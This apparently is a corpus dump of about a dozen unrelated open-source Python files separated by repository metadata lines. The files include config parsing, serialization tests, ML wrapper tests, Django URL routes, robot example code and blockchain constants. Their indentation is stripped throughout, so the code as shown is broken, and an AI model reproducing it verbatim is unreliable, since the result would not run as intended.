'key': 'datadog_application_key',
'option': 'datadog-application-key',
'required': False,
'type': 'str'
}
]
)
if 'default_options' in config_file.sections():
# nothing is required in defaults, so we set required to False
default_config_options = deepcopy(TABLE_CONFIG_OPTIONS)
for item in default_config_options:
item['required'] = False
default_options = __parse_options(
config_file, 'default_options', default_config_options)
# if we've got a default set required to be false for table parsing
for item in TABLE_CONFIG_OPTIONS:
if item['key'] in default_options:
item['required'] = False
else:
default_options = {}
#
# Handle [table: ]
#
table_config = {'tables': {}}
# Find the first table definition
found_table = False
for current_section in config_file.sections():
if current_section.rsplit(':', 1)[0] != 'table':
continue
found_table = True
current_table_name = current_section.rsplit(':', 1)[1].strip()
table_config['tables'][current_table_name] = \
dict(default_options.items() + __parse_options(
config_file, current_section, TABLE_CONFIG_OPTIONS).items())
if not found_table:
print('Could not find a [table: <table_name>] section in {0}'.format(
config_path))
sys.exit(1)
# Find gsi definitions - this allows gsi's to be defined before the table
# definitions we don't worry about parsing everything twice here
for current_section in config_file.sections():
try:
header1, gsi_key, header2, table_key = current_section.split(' ')
except ValueError:
continue
if header1 != 'gsi:':
continue
if table_key not in table_config['tables']:
print('No table configuration matching {0} found.'.format(
table_key))
sys.exit(1)
if 'gsis' not in table_config['tables'][table_key]:
table_config['tables'][table_key]['gsis'] = {}
table_config['tables'][table_key]['gsis'][gsi_key] = \
dict(default_options.items() + __parse_options(
config_file, current_section, TABLE_CONFIG_OPTIONS).items())
return dict(
global_config.items() +
logging_config.items() +
table_config.items() +
monitoring_config.items()
)
| 29.324153
| 77
| 0.486815
|
4d7d079e59959726ad2bb66d3a46b418c7d68bd3
| 3,220
|
py
|
Python
|
testing/tests/b64pickle_test.py
|
alexey74/django-concurrent-test-helper
|
1202915049a498d8fc31a75d83b459854f76750b
|
[
"Apache-2.0"
] | 13
|
2016-03-30T10:45:10.000Z
|
2020-12-29T14:15:50.000Z
|
testing/tests/b64pickle_test.py
|
alexey74/django-concurrent-test-helper
|
1202915049a498d8fc31a75d83b459854f76750b
|
[
"Apache-2.0"
] | 5
|
2017-04-05T14:56:32.000Z
|
2020-03-28T20:34:09.000Z
|
testing/tests/b64pickle_test.py
|
alexey74/django-concurrent-test-helper
|
1202915049a498d8fc31a75d83b459854f76750b
|
[
"Apache-2.0"
] | 1
|
2021-01-12T16:38:49.000Z
|
2021-01-12T16:38:49.000Z
|
# -*- coding: UTF-8 -*-
from __future__ import unicode_literals, print_function
from base64 import b64encode
from datetime import date, datetime
from decimal import Decimal
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import mock
import pytest
import pytz
from django_concurrent_tests import b64pickle
from django_concurrent_tests.utils import redirect_stdout
from testapp.models import Semaphore
def test_string():
obj = 'whatever 🚀'
encoded = b64pickle.dumps(obj)
assert b64pickle.loads(encoded) == obj
def test_dict():
obj = {'val': 'whatever 🚀'}
encoded = b64pickle.dumps(obj)
assert b64pickle.loads(encoded) == obj
def test_list():
obj = ['whatever 🚀']
encoded = b64pickle.dumps(obj)
assert b64pickle.loads(encoded) == obj
def test_decimal():
obj = Decimal('3.25')
encoded = b64pickle.dumps(obj)
# can't know from JSON that it was Decimal
assert b64pickle.loads(encoded) == obj
def test_datetime():
obj = datetime.now()
encoded = b64pickle.dumps(obj)
assert b64pickle.loads(encoded) == obj
def test_datetime_timezone():
obj = datetime.now().replace(tzinfo=pytz.timezone('US/Pacific'))
encoded = b64pickle.dumps(obj)
assert b64pickle.loads(encoded) == obj
def test_datetime_timezone_utc():
obj = datetime.now().replace(tzinfo=pytz.UTC)
encoded = b64pickle.dumps(obj)
assert b64pickle.loads(encoded) == obj
def test_date():
obj = date.today()
encoded = b64pickle.dumps(obj)
assert b64pickle.loads(encoded) == obj
def test_time():
obj = datetime.now().time()
encoded = b64pickle.dumps(obj)
assert b64pickle.loads(encoded) == obj
@pytest.mark.django_db
def test_model_queryset():
Semaphore.objects.create()
obj = list(Semaphore.objects.all())
encoded = b64pickle.dumps(obj)
assert b64pickle.loads(encoded) == obj
def test_string_stdout_roundtrip():
obj = 'whatever 🚀'
output = StringIO()
with redirect_stdout(output):
print('--kwargs=%s' % b64pickle.dumps(obj))
option = output.getvalue()
key, val = option.split('=', 1)
print(option)
print(val)
assert b64pickle.loads(val) == obj
def test_error_unpickling():
unpickle_error = RuntimeError("Could not unpickle")
b64pickled_value = b64encode("pickled value".encode('ascii'))
with mock.patch(
'pickle.loads',
side_effect=unpickle_error,
):
with pytest.raises(b64pickle.PickleLoadsError) as exc_info:
b64pickle.loads(b64pickled_value)
assert exc_info.value.args[0] == unpickle_error
assert exc_info.value.args[1] == "pickled value"
def test_error_unpickling_truncation():
unpickle_error = RuntimeError("Could not unpickle")
b64pickled_value = b64encode(
"pickled value,unpickle_traceback:blahblahblah".encode('ascii')
)
with mock.patch(
'pickle.loads',
side_effect=unpickle_error,
):
with pytest.raises(b64pickle.PickleLoadsError) as exc_info:
b64pickle.loads(b64pickled_value)
assert exc_info.value.args[0] == unpickle_error
assert exc_info.value.args[1] == "pickled value,unpickle_traceback..."
| 25.555556
| 74
| 0.694099
|
905ac1aeb3a2fe63b606126d66972d794eb15322
| 1,623
|
py
|
Python
|
geotrek/sensitivity/serializers.py
|
fossabot/Geotrek-admin
|
ea2c873511ad724c742c64d81cbf31f37dbe3093
|
[
"BSD-2-Clause"
] | null | null | null |
geotrek/sensitivity/serializers.py
|
fossabot/Geotrek-admin
|
ea2c873511ad724c742c64d81cbf31f37dbe3093
|
[
"BSD-2-Clause"
] | null | null | null |
geotrek/sensitivity/serializers.py
|
fossabot/Geotrek-admin
|
ea2c873511ad724c742c64d81cbf31f37dbe3093
|
[
"BSD-2-Clause"
] | null | null | null |
from django.core.urlresolvers import reverse
from django.utils.translation import get_language
from rest_framework import serializers as rest_serializers
from rest_framework_gis import serializers as geo_serializers
from geotrek.common.serializers import PictogramSerializerMixin, TranslatedModelSerializer
from geotrek.sensitivity import models as sensitivity_models
class SportPracticeSerializer(TranslatedModelSerializer):
class Meta:
model = sensitivity_models.SportPractice
fields = ('id', 'name')
class SpeciesSerializer(TranslatedModelSerializer, PictogramSerializerMixin):
practices = SportPracticeSerializer(many=True)
period = rest_serializers.SerializerMethodField()
def get_period(self, obj):
return [getattr(obj, 'period{:02}'.format(p)) for p in range(1, 13)]
class Meta:
model = sensitivity_models.Species
fields = ['id', 'name', 'practices', 'url', 'pictogram', 'period']
class SensitiveAreaSerializer(TranslatedModelSerializer):
species = SpeciesSerializer()
geometry = geo_serializers.GeometrySerializerMethodField(read_only=True)
kml_url = rest_serializers.SerializerMethodField(read_only=True)
def get_geometry(self, obj):
return obj.geom2d_transformed
def get_kml_url(self, obj):
return reverse('sensitivity:sensitivearea_kml_detail', kwargs={'lang': get_language(), 'pk': obj.pk})
class Meta:
model = sensitivity_models.SensitiveArea
geo_field = 'geometry'
fields = ('id', 'species', 'description', 'contact', 'published', 'publication_date', 'kml_url', 'geometry')
| 38.642857
| 116
| 0.749846
|
8cf33e5d398b6b9cb40dc27f9ddab1dcd73e7680
| 1,654
|
py
|
Python
|
tools/perf/benchmarks/indexeddb_perf.py
|
SlimKatLegacy/android_external_chromium_org
|
ee480ef5039d7c561fc66ccf52169ead186f1bea
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2
|
2015-03-04T02:36:53.000Z
|
2016-06-25T11:22:17.000Z
|
tools/perf/benchmarks/indexeddb_perf.py
|
j4ckfrost/android_external_chromium_org
|
a1a3dad8b08d1fcf6b6b36c267158ed63217c780
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
tools/perf/benchmarks/indexeddb_perf.py
|
j4ckfrost/android_external_chromium_org
|
a1a3dad8b08d1fcf6b6b36c267158ed63217c780
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 4
|
2015-02-09T08:49:30.000Z
|
2017-08-26T02:03:34.000Z
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs Chromium's IndexedDB performance test. These test:
Databases:
create/delete
Keys:
create/delete
Indexes:
create/delete
Data access:
Random read/write
Sporadic writes
Read cache
Cursors:
Read & random writes
Walking multiple
Seeking.
"""
import json
import os
from telemetry import test
from telemetry.core import util
from telemetry.page import page_measurement
from telemetry.page import page_set
class _IndexedDbMeasurement(page_measurement.PageMeasurement):
def MeasurePage(self, _, tab, results):
tab.WaitForDocumentReadyStateToBeComplete()
tab.WaitForJavaScriptExpression(
'window.document.cookie.indexOf("__done=1") >= 0', 600)
js_get_results = "JSON.stringify(automation.getResults());"
result_dict = json.loads(tab.EvaluateJavaScript(js_get_results))
total = 0.0
for key in result_dict:
if key == 'OverallTestDuration':
continue
msec = float(result_dict[key])
results.Add(key, 'ms', msec, data_type='unimportant')
total += msec
results.Add('Total', 'ms', total)
class IndexedDb(test.Test):
"""Chromium's IndexedDB Performance tests."""
test = _IndexedDbMeasurement
def CreatePageSet(self, options):
indexeddb_dir = os.path.join(util.GetChromiumSrcDir(), 'chrome', 'test',
'data', 'indexeddb')
return page_set.PageSet.FromDict({
'pages': [
{ 'url': 'file://perf_test.html' }
]
}, indexeddb_dir)
| 27.114754
| 76
| 0.69347
|
f96559c501ae5491a68e7d46164eb07f5e1d74b4
| 989
|
py
|
Python
|
django_server/api/urls.py
|
DigitalHealthIntegration/rdt-reader
|
242a4d813a6b58b3668f4d4ce35cea8f55bd651f
|
[
"MIT"
] | 2
|
2021-05-12T13:38:30.000Z
|
2022-02-26T13:45:54.000Z
|
django_server/api/urls.py
|
DigitalHealthIntegration/rdt-reader
|
242a4d813a6b58b3668f4d4ce35cea8f55bd651f
|
[
"MIT"
] | null | null | null |
django_server/api/urls.py
|
DigitalHealthIntegration/rdt-reader
|
242a4d813a6b58b3668f4d4ce35cea8f55bd651f
|
[
"MIT"
] | null | null | null |
"""api URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from rdtServer.views import ViewRdt
from rdtServer.views import DoHealthCheck
urlpatterns = [
path('admin/', admin.site.urls),
path('Quidel/QuickVue',ViewRdt),
path('Quidel/QuickVue/',ViewRdt),
path('health-check',DoHealthCheck),
path('health-check/',DoHealthCheck)
]
| 32.966667
| 77
| 0.715875
|
4502900de3229e5536af93887dcb375c2b370d99
| 1,793
|
py
|
Python
|
examples/tutorials/06_face_image.py
|
rmcolbert/vector-python-sdk
|
7e29e81578bd862b6462d7f7502c4aa67de29fb5
|
[
"Apache-2.0"
] | 516
|
2018-12-12T06:05:03.000Z
|
2022-03-30T10:00:20.000Z
|
examples/tutorials/06_face_image.py
|
rmcolbert/vector-python-sdk
|
7e29e81578bd862b6462d7f7502c4aa67de29fb5
|
[
"Apache-2.0"
] | 37
|
2018-12-12T09:41:46.000Z
|
2022-03-06T13:42:24.000Z
|
examples/tutorials/06_face_image.py
|
rmcolbert/vector-python-sdk
|
7e29e81578bd862b6462d7f7502c4aa67de29fb5
|
[
"Apache-2.0"
] | 350
|
2018-12-11T23:24:01.000Z
|
2022-03-16T12:57:33.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2018 Anki, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Display an image on Vector's face
"""
import os
import sys
import time
try:
from PIL import Image
except ImportError:
sys.exit("Cannot import from PIL: Do `pip3 install --user Pillow` to install")
import anki_vector
from anki_vector.util import degrees
def main():
args = anki_vector.util.parse_command_args()
with anki_vector.Robot(args.serial) as robot:
# If necessary, move Vector's Head and Lift to make it easy to see his face
robot.behavior.set_head_angle(degrees(45.0))
robot.behavior.set_lift_height(0.0)
current_directory = os.path.dirname(os.path.realpath(__file__))
image_path = os.path.join(current_directory, "..", "face_images", "cozmo_image.jpg")
# Load an image
image_file = Image.open(image_path)
# Convert the image to the format used by the Screen
print("Display image on Vector's face...")
screen_data = anki_vector.screen.convert_image_to_screen_data(image_file)
duration_s = 4.0
robot.screen.set_screen_with_image_data(screen_data, duration_s)
time.sleep(duration_s)
if __name__ == "__main__":
main()
| 30.913793
| 92
| 0.714445
|
8491ed0098ecfe2f7009bc35b684154223d7863b
| 9,641
|
py
|
Python
|
tensorflow/python/keras/layers/rnn_cell_wrapper_v2_test.py
|
joshz123/tensorflow
|
7841ca029060ab78e221e757d4b1ee6e3e0ffaa4
|
[
"Apache-2.0"
] | 78
|
2020-08-04T12:36:25.000Z
|
2022-03-25T04:23:40.000Z
|
tensorflow/python/keras/layers/rnn_cell_wrapper_v2_test.py
|
joshz123/tensorflow
|
7841ca029060ab78e221e757d4b1ee6e3e0ffaa4
|
[
"Apache-2.0"
] | 203
|
2019-06-14T23:53:10.000Z
|
2022-02-10T02:27:23.000Z
|
tensorflow/python/keras/layers/rnn_cell_wrapper_v2_test.py
|
joshz123/tensorflow
|
7841ca029060ab78e221e757d4b1ee6e3e0ffaa4
|
[
"Apache-2.0"
] | 28
|
2020-02-10T07:03:06.000Z
|
2022-01-12T11:19:20.000Z
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for RNN cell wrapper v2 implementation."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.keras import combinations
from tensorflow.python.keras import layers
from tensorflow.python.keras.layers import rnn_cell_wrapper_v2
from tensorflow.python.keras.utils import generic_utils
from tensorflow.python.layers import base as base_layer
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import test
@combinations.generate(combinations.combine(mode=["graph", "eager"]))
class RNNCellWrapperTest(test.TestCase, parameterized.TestCase):
def testResidualWrapper(self):
wrapper_type = rnn_cell_wrapper_v2.ResidualWrapper
x = ops.convert_to_tensor_v2(np.array([[1., 1., 1.]]), dtype="float32")
m = ops.convert_to_tensor_v2(np.array([[0.1, 0.1, 0.1]]), dtype="float32")
base_cell = rnn_cell_impl.GRUCell(
3, kernel_initializer=init_ops.constant_initializer(0.5),
bias_initializer=init_ops.constant_initializer(0.5))
g, m_new = base_cell(x, m)
wrapper_object = wrapper_type(base_cell)
(name, dep), = wrapper_object._checkpoint_dependencies
wrapper_object.get_config() # Should not throw an error
self.assertIs(dep, base_cell)
self.assertEqual("cell", name)
g_res, m_new_res = wrapper_object(x, m)
self.evaluate([variables_lib.global_variables_initializer()])
res = self.evaluate([g, g_res, m_new, m_new_res])
# Residual connections
self.assertAllClose(res[1], res[0] + [1., 1., 1.])
# States are left untouched
self.assertAllClose(res[2], res[3])
def testResidualWrapperWithSlice(self):
wrapper_type = rnn_cell_wrapper_v2.ResidualWrapper
x = ops.convert_to_tensor_v2(
np.array([[1., 1., 1., 1., 1.]]), dtype="float32")
m = ops.convert_to_tensor_v2(np.array([[0.1, 0.1, 0.1]]), dtype="float32")
base_cell = rnn_cell_impl.GRUCell(
3, kernel_initializer=init_ops.constant_initializer(0.5),
bias_initializer=init_ops.constant_initializer(0.5))
g, m_new = base_cell(x, m)
def residual_with_slice_fn(inp, out):
inp_sliced = array_ops.slice(inp, [0, 0], [-1, 3])
return inp_sliced + out
g_res, m_new_res = wrapper_type(
base_cell, residual_with_slice_fn)(x, m)
self.evaluate([variables_lib.global_variables_initializer()])
res_g, res_g_res, res_m_new, res_m_new_res = self.evaluate(
[g, g_res, m_new, m_new_res])
# Residual connections
self.assertAllClose(res_g_res, res_g + [1., 1., 1.])
# States are left untouched
self.assertAllClose(res_m_new, res_m_new_res)
def testDeviceWrapper(self):
wrapper_type = rnn_cell_wrapper_v2.DeviceWrapper
x = array_ops.zeros([1, 3])
m = array_ops.zeros([1, 3])
cell = rnn_cell_impl.GRUCell(3)
wrapped_cell = wrapper_type(cell, "/cpu:0")
(name, dep), = wrapped_cell._checkpoint_dependencies
wrapped_cell.get_config() # Should not throw an error
self.assertIs(dep, cell)
self.assertEqual("cell", name)
outputs, _ = wrapped_cell(x, m)
self.assertIn("cpu:0", outputs.device.lower())
@parameterized.parameters(
[[rnn_cell_impl.DropoutWrapper, rnn_cell_wrapper_v2.DropoutWrapper],
[rnn_cell_impl.ResidualWrapper, rnn_cell_wrapper_v2.ResidualWrapper]])
def testWrapperKerasStyle(self, wrapper, wrapper_v2):
"""Tests if wrapper cell is instantiated in keras style scope."""
wrapped_cell_v2 = wrapper_v2(rnn_cell_impl.BasicRNNCell(1))
self.assertIsNone(getattr(wrapped_cell_v2, "_keras_style", None))
wrapped_cell = wrapper(rnn_cell_impl.BasicRNNCell(1))
self.assertFalse(wrapped_cell._keras_style)
@parameterized.parameters(
[rnn_cell_wrapper_v2.DropoutWrapper, rnn_cell_wrapper_v2.ResidualWrapper])
def testWrapperWeights(self, wrapper):
"""Tests that wrapper weights contain wrapped cells weights."""
base_cell = layers.SimpleRNNCell(1, name="basic_rnn_cell")
rnn_cell = wrapper(base_cell)
rnn_layer = layers.RNN(rnn_cell)
inputs = ops.convert_to_tensor_v2([[[1]]], dtype=dtypes.float32)
rnn_layer(inputs)
wrapper_name = generic_utils.to_snake_case(wrapper.__name__)
expected_weights = ["rnn/" + wrapper_name + "/" + var for var in
("kernel:0", "recurrent_kernel:0", "bias:0")]
self.assertLen(rnn_cell.weights, 3)
self.assertCountEqual([v.name for v in rnn_cell.weights], expected_weights)
self.assertCountEqual([v.name for v in rnn_cell.trainable_variables],
expected_weights)
self.assertCountEqual([v.name for v in rnn_cell.non_trainable_variables],
[])
self.assertCountEqual([v.name for v in rnn_cell.cell.weights],
expected_weights)
@parameterized.parameters(
[rnn_cell_wrapper_v2.DropoutWrapper, rnn_cell_wrapper_v2.ResidualWrapper])
def testWrapperV2Caller(self, wrapper):
"""Tests that wrapper V2 is using the LayerRNNCell's caller."""
with base_layer.keras_style_scope():
base_cell = rnn_cell_impl.MultiRNNCell(
[rnn_cell_impl.BasicRNNCell(1) for _ in range(2)])
rnn_cell = wrapper(base_cell)
inputs = ops.convert_to_tensor_v2([[1]], dtype=dtypes.float32)
state = ops.convert_to_tensor_v2([[1]], dtype=dtypes.float32)
_ = rnn_cell(inputs, [state, state])
weights = base_cell._cells[0].weights
self.assertLen(weights, expected_len=2)
self.assertTrue(all("_wrapper" in v.name for v in weights))
@parameterized.parameters(
[rnn_cell_wrapper_v2.DropoutWrapper, rnn_cell_wrapper_v2.ResidualWrapper])
def testWrapperV2Build(self, wrapper):
cell = rnn_cell_impl.LSTMCell(10)
wrapper = wrapper(cell)
wrapper.build((1,))
self.assertTrue(cell.built)
def testDeviceWrapperSerialization(self):
wrapper_cls = rnn_cell_wrapper_v2.DeviceWrapper
cell = layers.LSTMCell(10)
wrapper = wrapper_cls(cell, "/cpu:0")
config = wrapper.get_config()
reconstructed_wrapper = wrapper_cls.from_config(config)
self.assertDictEqual(config, reconstructed_wrapper.get_config())
self.assertIsInstance(reconstructed_wrapper, wrapper_cls)
def testResidualWrapperSerialization(self):
wrapper_cls = rnn_cell_wrapper_v2.ResidualWrapper
cell = layers.LSTMCell(10)
wrapper = wrapper_cls(cell)
config = wrapper.get_config()
reconstructed_wrapper = wrapper_cls.from_config(config)
self.assertDictEqual(config, reconstructed_wrapper.get_config())
self.assertIsInstance(reconstructed_wrapper, wrapper_cls)
wrapper = wrapper_cls(cell, residual_fn=lambda i, o: i + i + o)
config = wrapper.get_config()
reconstructed_wrapper = wrapper_cls.from_config(config)
# Assert the reconstructed function will perform the math correctly.
self.assertEqual(reconstructed_wrapper._residual_fn(1, 2), 4)
def residual_fn(inputs, outputs):
return inputs * 3 + outputs
wrapper = wrapper_cls(cell, residual_fn=residual_fn)
config = wrapper.get_config()
reconstructed_wrapper = wrapper_cls.from_config(config)
# Assert the reconstructed function will perform the math correctly.
self.assertEqual(reconstructed_wrapper._residual_fn(1, 2), 5)
def testDropoutWrapperSerialization(self):
wrapper_cls = rnn_cell_wrapper_v2.DropoutWrapper
cell = layers.GRUCell(10)
wrapper = wrapper_cls(cell)
config = wrapper.get_config()
reconstructed_wrapper = wrapper_cls.from_config(config)
self.assertDictEqual(config, reconstructed_wrapper.get_config())
self.assertIsInstance(reconstructed_wrapper, wrapper_cls)
wrapper = wrapper_cls(cell, dropout_state_filter_visitor=lambda s: True)
config = wrapper.get_config()
reconstructed_wrapper = wrapper_cls.from_config(config)
self.assertTrue(reconstructed_wrapper._dropout_state_filter(None))
def dropout_state_filter_visitor(unused_state):
return False
wrapper = wrapper_cls(
cell, dropout_state_filter_visitor=dropout_state_filter_visitor)
config = wrapper.get_config()
reconstructed_wrapper = wrapper_cls.from_config(config)
self.assertFalse(reconstructed_wrapper._dropout_state_filter(None))
def testDropoutWrapperWithKerasLSTMCell(self):
wrapper_cls = rnn_cell_wrapper_v2.DropoutWrapper
cell = layers.LSTMCell(10)
with self.assertRaisesRegexp(ValueError, "does not work with "):
wrapper_cls(cell)
cell = layers.LSTMCellV2(10)
with self.assertRaisesRegexp(ValueError, "does not work with "):
wrapper_cls(cell)
if __name__ == "__main__":
test.main()
| 41.025532
| 80
| 0.733326
|
6471e53a2b50a578cc0a32c5b9064b6a6b64a893
| 1,080
|
py
|
Python
|
arcade/python/arcade-theCore/10_LabOfTransformations/086_Decipher.py
|
netor27/codefights-arcade-solutions
|
69701ab06d45902c79ec9221137f90b75969d8c8
|
[
"MIT"
] | null | null | null |
arcade/python/arcade-theCore/10_LabOfTransformations/086_Decipher.py
|
netor27/codefights-arcade-solutions
|
69701ab06d45902c79ec9221137f90b75969d8c8
|
[
"MIT"
] | null | null | null |
arcade/python/arcade-theCore/10_LabOfTransformations/086_Decipher.py
|
netor27/codefights-arcade-solutions
|
69701ab06d45902c79ec9221137f90b75969d8c8
|
[
"MIT"
] | null | null | null |
'''
Consider the following ciphering algorithm:
For each character replace it with its code.
Concatenate all of the obtained numbers.
Given a ciphered string, return the initial one if it is known that it consists only of lowercase letters.
Note: here the character's code means its decimal ASCII code, the numerical representation of a character used by most modern programming languages.
Example
For cipher = "10197115121", the output should be
decipher(cipher) = "easy".
Explanation: charCode('e') = 101, charCode('a') = 97, charCode('s') = 115 and charCode('y') = 121.
'''
def decipher(cipher):
start = 0
end = 0
result =[]
for i in range(len(cipher)):
temp = castToValidLetter(cipher, start, end)
if temp != '':
result.append(temp)
start = i+1
end = i+1
else:
end +=1
return ''.join(result)
def castToValidLetter(cipher, start, end):
temp = int(cipher[start:end+1])
if ord('a') <= temp <= ord('z'):
return chr(temp)
else:
return ''
| 28.421053
| 148
| 0.628704
|
be70b1f0e1ec5cae9c1b572b3552bb694d71c95a
| 2,282
|
py
|
Python
|
sdk/python/pulumi_azure_nextgen/labservices/v20181015/get_global_user_operation_status.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_nextgen/labservices/v20181015/get_global_user_operation_status.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_nextgen/labservices/v20181015/get_global_user_operation_status.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'GetGlobalUserOperationStatusResult',
'AwaitableGetGlobalUserOperationStatusResult',
'get_global_user_operation_status',
]
@pulumi.output_type
class GetGlobalUserOperationStatusResult:
"""
Status Details of the long running operation for an environment
"""
def __init__(__self__, status=None):
if status and not isinstance(status, str):
raise TypeError("Expected argument 'status' to be a str")
pulumi.set(__self__, "status", status)
@property
@pulumi.getter
def status(self) -> str:
"""
status of the long running operation for an environment
"""
return pulumi.get(self, "status")
class AwaitableGetGlobalUserOperationStatusResult(GetGlobalUserOperationStatusResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetGlobalUserOperationStatusResult(
status=self.status)
def get_global_user_operation_status(operation_url: Optional[str] = None,
user_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetGlobalUserOperationStatusResult:
"""
Use this data source to access information about an existing resource.
:param str operation_url: The operation url of long running operation
:param str user_name: The name of the user.
"""
__args__ = dict()
__args__['operationUrl'] = operation_url
__args__['userName'] = user_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:labservices/v20181015:getGlobalUserOperationStatus', __args__, opts=opts, typ=GetGlobalUserOperationStatusResult).value
return AwaitableGetGlobalUserOperationStatusResult(
status=__ret__.status)
| 35.107692
| 170
| 0.695004
|
06f57cbad9d521a407114aeb45de9d0195f21523
| 211
|
py
|
Python
|
espressodb/documentation/apps.py
|
remram44/espressodb
|
5aad7222ab81c0f1694b51171e5d197dbcc8a65f
|
[
"BSD-3-Clause"
] | 8
|
2019-12-10T04:30:01.000Z
|
2020-10-30T09:40:22.000Z
|
espressodb/documentation/apps.py
|
remram44/espressodb
|
5aad7222ab81c0f1694b51171e5d197dbcc8a65f
|
[
"BSD-3-Clause"
] | 41
|
2019-10-23T00:26:25.000Z
|
2021-10-21T07:55:57.000Z
|
espressodb/documentation/apps.py
|
remram44/espressodb
|
5aad7222ab81c0f1694b51171e5d197dbcc8a65f
|
[
"BSD-3-Clause"
] | 3
|
2020-01-09T21:29:09.000Z
|
2021-03-14T22:20:52.000Z
|
# pylint: disable=missing-docstring
from django.apps import AppConfig
class DocumentationConfig(AppConfig):
name = "espressodb.documentation"
verbose_name = "Documentation"
label = "documentation"
| 23.444444
| 37
| 0.763033
|
a6cab50749025eeeca9f5abce049d5a55b7793c9
| 12,317
|
py
|
Python
|
iconservice/icon_constant.py
|
icon-project/icon-service
|
dfa61fcc42425390a0398ada42ce2121278eec08
|
[
"Apache-2.0"
] | 52
|
2018-08-24T02:28:43.000Z
|
2021-07-06T04:44:22.000Z
|
iconservice/icon_constant.py
|
icon-project/icon-service
|
dfa61fcc42425390a0398ada42ce2121278eec08
|
[
"Apache-2.0"
] | 62
|
2018-09-17T06:59:16.000Z
|
2021-12-15T06:02:51.000Z
|
iconservice/icon_constant.py
|
icon-project/icon-service
|
dfa61fcc42425390a0398ada42ce2121278eec08
|
[
"Apache-2.0"
] | 35
|
2018-09-14T02:42:10.000Z
|
2022-02-05T10:34:46.000Z
|
# Copyright 2018 ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from enum import IntFlag, unique, IntEnum, Enum, auto, Flag
SYSTEM_ADDRESS = "cx0000000000000000000000000000000000000000"
GOVERNANCE_ADDRESS = "cx0000000000000000000000000000000000000001"
ICON_DEPLOY_LOG_TAG = "DEPLOY"
ICON_LOADER_LOG_TAG = "LOADER"
ICX_LOG_TAG = "ICX"
ICON_DB_LOG_TAG = "DB"
IISS_LOG_TAG = "IISS"
STEP_LOG_TAG = "STEP"
WAL_LOG_TAG = "WAL"
ROLLBACK_LOG_TAG = "ROLLBACK"
BACKUP_LOG_TAG = "BACKUP"
JSONRPC_VERSION = '2.0'
CHARSET_ENCODING = 'utf-8'
ICX_IN_LOOP = 10 ** 18
# 32bytes == 256bit
DEFAULT_BYTE_SIZE = 32
DATA_BYTE_ORDER = 'big' # big endian
# Fixed fee is 0.01 icx.
FIXED_FEE = 10 ** 16
# Max data field size
MAX_DATA_SIZE = 512 * 1024
# Max external call count(1 is default SCORE call, 1024 is external call in the SCORE)
MAX_EXTERNAL_CALL_COUNT = 1 + 1024
# Max call stack size
MAX_CALL_STACK_SIZE = 64
ICON_DEX_DB_NAME = 'icon_dex'
PACKAGE_JSON_FILE = 'package.json'
ICX_TRANSFER_EVENT_LOG = 'ICXTransfer(Address,Address,int)'
ICON_SCORE_QUEUE_NAME_FORMAT = "IconScore.{channel_name}.{amqp_key}"
ICON_SERVICE_PROCTITLE_FORMAT = "icon_service." \
